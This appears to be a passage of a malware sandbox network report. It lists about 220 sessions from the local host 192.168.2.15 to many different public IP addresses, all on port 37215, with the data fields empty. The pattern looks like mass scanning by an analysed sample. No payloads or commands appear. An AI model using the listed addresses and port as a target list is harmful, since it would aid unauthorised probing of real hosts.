                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27126192.168.2.154071431.75.199.25537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27127192.168.2.153691845.125.253.22437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27128192.168.2.1535910197.141.60.16137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27129192.168.2.155436894.88.192.3537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27130192.168.2.155040631.188.209.9337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27131192.168.2.1555626181.223.231.19537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27132192.168.2.1540338156.2.215.21137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27133192.168.2.154510845.40.0.16337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27134192.168.2.1552916102.230.26.2137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27135192.168.2.1546138197.143.112.23437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27136192.168.2.1539032186.68.230.14437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27137192.168.2.154351831.118.175.22737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27138192.168.2.155469294.240.144.19837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27139192.168.2.1537180122.94.4.12637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27140192.168.2.1552808181.40.221.14937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27141192.168.2.1544856190.31.89.18637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27142192.168.2.1552686197.234.139.21137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27143192.168.2.155673841.150.55.10037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27144192.168.2.1542956190.174.185.637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27145192.168.2.1555934138.136.223.24537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27146192.168.2.154406631.175.27.7437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27147192.168.2.156038241.30.251.17537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27148192.168.2.1546404121.27.173.23537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27149192.168.2.155544831.136.198.9337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27150192.168.2.1540776138.107.97.20137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27151192.168.2.1545362102.2.59.1837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27152192.168.2.153773437.31.119.4537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27153192.168.2.153881294.153.195.22237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27154192.168.2.155603231.8.39.17337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27155192.168.2.1539806122.80.56.25137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27156192.168.2.1537502222.80.156.15437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27157192.168.2.1535642222.138.85.23037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27158192.168.2.1532954190.47.252.9137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27159192.168.2.1553792197.73.213.23237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27160192.168.2.1544390197.223.138.23237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27161192.168.2.154739241.101.164.6137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27162192.168.2.154270831.215.197.14437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27163192.168.2.1541254138.211.23.17437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27164192.168.2.1552196197.131.12.18537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27165192.168.2.1551294157.255.0.4237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27166192.168.2.1542894156.166.239.22037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27167192.168.2.1536382222.138.147.9837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27168192.168.2.1554468197.56.21.22337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27169192.168.2.1559754121.182.81.15337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27170192.168.2.154581652.58.238.16437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27171192.168.2.153359045.104.7.9737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27172192.168.2.1552748197.65.167.1837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27173192.168.2.154702641.214.22.3737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27174192.168.2.1547270138.32.6.18837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27175192.168.2.154309694.238.11.19037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27176192.168.2.1541682121.118.64.6137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27177192.168.2.154024637.122.227.17737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27178192.168.2.1547458197.255.184.22437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27179192.168.2.1552482122.28.17.24337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27180192.168.2.1540214197.78.28.21537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27181192.168.2.154467631.65.221.17537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27182192.168.2.1537906181.99.177.24937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27183192.168.2.1539396186.151.243.18837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27184192.168.2.1537790157.71.135.21337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27185192.168.2.1543056181.117.198.20237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27186192.168.2.1548446186.10.252.2737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27187192.168.2.1549324156.212.195.20837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27188192.168.2.1532926157.62.189.13537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27189192.168.2.1560086222.58.192.8837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27190192.168.2.1535424121.197.210.10137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27191192.168.2.154218837.229.154.15537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27192192.168.2.1555012222.43.246.10337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27193192.168.2.155257841.10.108.5537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27194192.168.2.153792241.41.233.16637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27195192.168.2.1552804181.236.85.17837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27196192.168.2.1560088190.233.73.21937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27197192.168.2.154960031.238.247.12537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27198192.168.2.155523041.220.73.16037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27199192.168.2.153524031.239.167.17937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27200192.168.2.1557400190.235.51.23937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27201192.168.2.1549472190.139.175.18337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27202192.168.2.155824845.75.224.2337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27203192.168.2.154290441.186.209.9437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27204192.168.2.1541010102.82.235.11737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27205192.168.2.1548810186.2.91.17037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27206192.168.2.153671845.71.126.6837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27207192.168.2.153561837.239.65.20937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27208192.168.2.1546434197.250.190.8537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27209192.168.2.1539510102.135.62.19337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27210192.168.2.154560645.36.56.20037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27211192.168.2.1559746157.100.116.5937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27212192.168.2.1536950186.211.104.14137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27213192.168.2.1555780197.50.223.5337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27214192.168.2.1547990222.116.233.22737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27215192.168.2.155803437.156.187.1337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27216192.168.2.1558604156.191.19.7537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27217192.168.2.1545336197.161.13.14437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27218192.168.2.1536782190.136.106.10737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27219192.168.2.1544690102.168.28.437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27220192.168.2.1558872181.139.211.2237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27221192.168.2.153632417.191.216.24337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27222192.168.2.155346012.219.109.18537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27223192.168.2.155364231.120.82.5337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27224192.168.2.1537992157.208.132.19637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27225192.168.2.1556384121.62.119.20237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27226192.168.2.155310431.93.230.14337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27227192.168.2.153322845.157.255.17837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27228192.168.2.1557114122.47.65.2437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27229192.168.2.1560294222.60.6.11937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27230192.168.2.1533302186.184.86.22737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27231192.168.2.154090431.131.51.18637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27232192.168.2.1558438156.169.206.5737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27233192.168.2.1550030138.24.71.16237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27234192.168.2.1545892138.198.107.6037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27235192.168.2.155024264.125.108.3837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27236192.168.2.154348894.47.245.5637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27237192.168.2.1539140157.80.179.14237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27238192.168.2.154924431.8.253.21737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27239192.168.2.153544694.10.173.22537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27240192.168.2.1536410102.122.0.337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27241192.168.2.1536682121.249.159.2537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27242192.168.2.1553982181.24.229.18737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27243192.168.2.154096441.97.136.8437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27244192.168.2.155009694.206.24.14937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27245192.168.2.155674431.172.20.10737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27246192.168.2.1534860186.20.144.25037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27247192.168.2.154248441.18.147.5437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27248192.168.2.1548496121.62.25.7737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27249192.168.2.155063237.11.82.6037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27250192.168.2.1539068186.92.240.24137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27251192.168.2.1540132157.169.135.11737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27252192.168.2.155080445.82.144.7337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27253192.168.2.1539406122.184.132.22237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27254192.168.2.1540460102.131.2.12937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27255192.168.2.1533110181.13.129.7237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27256192.168.2.1537164186.22.165.3537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27257192.168.2.1538400122.155.232.13337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27258192.168.2.155005041.204.228.4637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27259192.168.2.1542640122.95.209.18037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27260192.168.2.1556396122.43.36.18537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27261192.168.2.1546198181.99.28.4837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27262192.168.2.155503445.250.190.2237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27263192.168.2.155389831.190.0.16337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27264192.168.2.1539834190.72.33.18437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27265192.168.2.1540852157.32.8.9537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27266192.168.2.156068641.116.67.16837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27267192.168.2.155439431.182.14.19337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27268192.168.2.153748437.62.177.12237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27269192.168.2.1541462156.52.206.25037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27270192.168.2.155973845.8.192.2937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27271192.168.2.155519094.193.175.15637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27272192.168.2.1546142186.240.246.6137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27273192.168.2.153770245.198.126.22537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27274192.168.2.1554568197.101.10.1337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27275192.168.2.153475894.115.165.23437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27276192.168.2.154540845.65.90.16737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27277192.168.2.154406645.63.207.7237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27278192.168.2.154485031.201.145.1837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27279192.168.2.155893237.5.3.8137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27280192.168.2.153568845.142.22.19637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27281192.168.2.155316084.136.19.9337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27282192.168.2.1538282181.121.202.6737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27283192.168.2.154210637.233.140.13437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27284192.168.2.1553954122.201.126.25537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27285192.168.2.155711494.79.52.3337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27286192.168.2.154979294.145.95.1737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27287192.168.2.1535448197.78.122.14737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27288192.168.2.1542544186.77.233.8337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27289192.168.2.1553106190.33.200.24037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27290192.168.2.155126637.224.219.13837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27291192.168.2.1557656156.222.32.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27292192.168.2.1540610190.221.150.1537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27293192.168.2.1543540122.50.162.6737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27294192.168.2.1554504102.132.105.11037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27295192.168.2.1542486190.217.128.22337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27296192.168.2.1556588138.226.53.7237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27297192.168.2.1539076197.239.56.13237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27298192.168.2.1534814102.164.66.18137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27299192.168.2.1533774122.169.57.15637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27300192.168.2.1557786197.60.239.22337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27301192.168.2.1549584138.67.187.25037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27302192.168.2.155130431.135.183.16537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27303192.168.2.1549948197.175.53.12937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27304192.168.2.1548198122.68.185.12137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27305192.168.2.1551560138.105.126.20637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27306192.168.2.1547608156.133.82.19637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27307192.168.2.1548090186.30.138.16637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27308192.168.2.154987237.249.215.11137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27309192.168.2.155917631.78.112.15937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27310192.168.2.1555144222.165.116.5437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27311192.168.2.155933894.14.75.15137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27312192.168.2.1537164138.167.230.17837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27313192.168.2.155642637.69.128.15537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27314192.168.2.1554398190.114.157.23137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27315192.168.2.1547862190.217.241.10537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27316192.168.2.1559782121.168.202.5537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27317192.168.2.1559864122.88.129.25137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27318192.168.2.1541772186.164.166.10737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27319192.168.2.1542996197.84.28.1037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27320192.168.2.1559634197.116.219.2837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27321192.168.2.1546762138.139.247.9037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27322192.168.2.1556820122.234.105.5937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27323192.168.2.1533016102.208.230.23637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27324192.168.2.1539446157.131.12.15137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27325192.168.2.1551654121.191.84.1637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27326192.168.2.153421841.7.196.20037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27327192.168.2.155189431.85.197.4637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27328192.168.2.155767294.203.103.8137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27329192.168.2.155834894.194.9.5537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27330192.168.2.154375845.72.136.15237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27331192.168.2.1544012222.178.193.25037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27332192.168.2.153829294.234.159.24937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27333192.168.2.154318245.191.152.15737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27334192.168.2.1533798186.213.31.4937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27335192.168.2.156075494.43.104.6637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27336192.168.2.1547304222.194.30.3937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27337192.168.2.1553448121.148.130.15137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27338192.168.2.1556020157.45.229.22937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27339192.168.2.154419694.13.90.20337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27340192.168.2.1545294222.201.105.10337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27341192.168.2.1542450197.144.84.19837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27342192.168.2.1548002222.235.235.24837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27343192.168.2.153470445.243.9.18237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
